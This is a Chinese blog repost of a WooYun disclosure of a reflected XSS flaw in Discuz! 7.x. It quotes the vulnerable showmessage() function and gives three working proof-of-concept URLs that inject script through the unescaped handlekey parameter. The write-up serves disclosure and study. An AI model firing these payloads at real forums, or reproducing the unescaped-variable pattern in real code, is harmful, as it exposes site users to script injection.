1. 程式人生 > >Discuz! 7.x 反射型xss

Discuz! 7.x 反射型xss

觸發 res extra highlight type foreach scu serialize yun

引用:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-084097.html

在/include/global.func.php 文件中 第1036-1119行中

function showmessage($message, $url_forward = ‘‘, $extra = ‘‘, $forwardtype = 0) {
	extract($GLOBALS, EXTR_SKIP);
	global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
	define(‘CACHE_FORBIDDEN‘, TRUE);
	$hookscriptmessage = $show_message = $message;$messagehandle = 0;
	$msgforward = unserialize($_DCACHE[‘settings‘][‘msgforward‘]);
	$refreshtime = intval($msgforward[‘refreshtime‘]);
	$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
	$msgforward[‘refreshtime‘] = $refreshtime * 1000;
	$url_forward = empty($url_forward) ? ‘‘ : (empty($_DCOOKIE[‘sid‘]) && $transsidstatus ? transsid($url_forward) : $url_forward);
	$seccodecheck = $seccodestatus & 2;
	if($_DCACHE[‘settings‘][‘funcsiteid‘] && $_DCACHE[‘settings‘][‘funckey‘] && $funcstatinfo && !IS_ROBOT) {
		$statlogfile = DISCUZ_ROOT.‘./forumdata/funcstat.log‘;
		if($fp = @fopen($statlogfile, ‘a‘)) {
			@flock($fp, 2);
			if(is_array($funcstatinfo)) {
				$funcstatinfo = array_unique($funcstatinfo);
				foreach($funcstatinfo as $funcinfo) {
					fwrite($fp, funcstat_query($funcinfo, $message)."\n");
				}
			} else {
				fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
			}
			fclose($fp);
			$funcstatinfo = $GLOBALS[‘funcstatinfo‘] = ‘‘;
		}
	}

	if(!defined(‘STAT_DISABLED‘) && STAT_ID > 0 && !IS_ROBOT) {
		write_statlog($message);
	}

	if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward[‘quick‘] && $msgforward[‘messages‘] && @in_array($message, $msgforward[‘messages‘]))) {
		updatesession();
		dheader("location: ".str_replace(‘&‘, ‘&‘, $url_forward));
	}
	if(!empty($infloat)) {
		if($extra) {
			$messagehandle = $extra;
		}
		$extra = ‘‘;
	}
	if(in_array($extra, array(‘HALTED‘, ‘NOPERM‘))) {
		$discuz_action = 254;
	} else {
		$discuz_action = 255;
	}

	include language(‘messages‘);

	$vars = explode(‘:‘, $message);
	if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {
		eval("\$show_message = \"".str_replace(‘"‘, ‘\"‘, $scriptlang[$vars[0]][$vars[1]])."\";");
	} elseif(isset($language[$message])) {
		$pre = $inajax ? ‘ajax_‘ : ‘‘;
		eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
		unset($pre);
	}

	if(empty($infloat)) {
		$show_message .= $url_forward && empty($inajax) ? ‘<script>setTimeout("window.location.href =\‘‘.$url_forward.‘\‘;", ‘.$msgforward[‘refreshtime‘].‘);</script>‘ : ‘‘;
	} elseif($handlekey) {
		$show_message = str_replace("‘", "\‘", $show_message);
		if($url_forward) {
			$show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($(‘return_$handlekey‘)) $(‘return_$handlekey‘).className = ‘onright‘;\nif(typeof submithandle_$handlekey ==‘function‘) {submithandle_$handlekey(‘$url_forward‘, ‘$show_message‘);} else {location.href=‘$url_forward‘}\n</script>";
		} else {
			$show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey ==‘function‘) {messagehandle_$handlekey(‘$messagehandle‘, ‘$show_message‘);}\n</script>";
		}
	}

	if($advlist = array_merge($globaladvs ? $globaladvs[‘type‘] : array(), $redirectadvs ? $redirectadvs[‘type‘] : array())) {
		$advitems = ($globaladvs ? $globaladvs[‘items‘] : array()) + ($redirectadvs ? $redirectadvs[‘items‘] : array());
		foreach($advlist AS $type => $redirectadvs) {
			$advlist[$type] = $advitems[$redirectadvs[array_rand($redirectadvs)]];
		}
	}

	if($extra == ‘NOPERM‘) {
		include template(‘nopermission‘);
	} else {
		include template(‘showmessage‘);
	}
	dexit();
}

  在這段代碼中:

elseif($handlekey) {
		$show_message = str_replace("‘", "\‘", $show_message);
		if($url_forward) {
			$show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($(‘return_$handlekey‘)) $(‘return_$handlekey‘).className = ‘onright‘;\nif(typeof submithandle_$handlekey ==‘function‘) {submithandle_$handlekey(‘$url_forward‘, ‘$show_message‘);} else {location.href=‘$url_forward‘}\n</script>";
		} else {
			$show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey ==‘function‘) {messagehandle_$handlekey(‘$messagehandle‘, ‘$show_message‘);}\n</script>";
		}
	}

  

如果不存在$url_forward參數就走else,

然而這個$handlekey並沒有加引號,所以不存在繞不繞過,直接觸發。

漏洞url:

/admincp.php?infloat=yes&handlekey=123);alert(/xss/);//

/logging.php?infloat=yes&handlekey=123);alert(/xss/);//

/api/uchome.php?infloat=yes&handlekey=123);alert(/xss/);//

Discuz! 7.x 反射型xss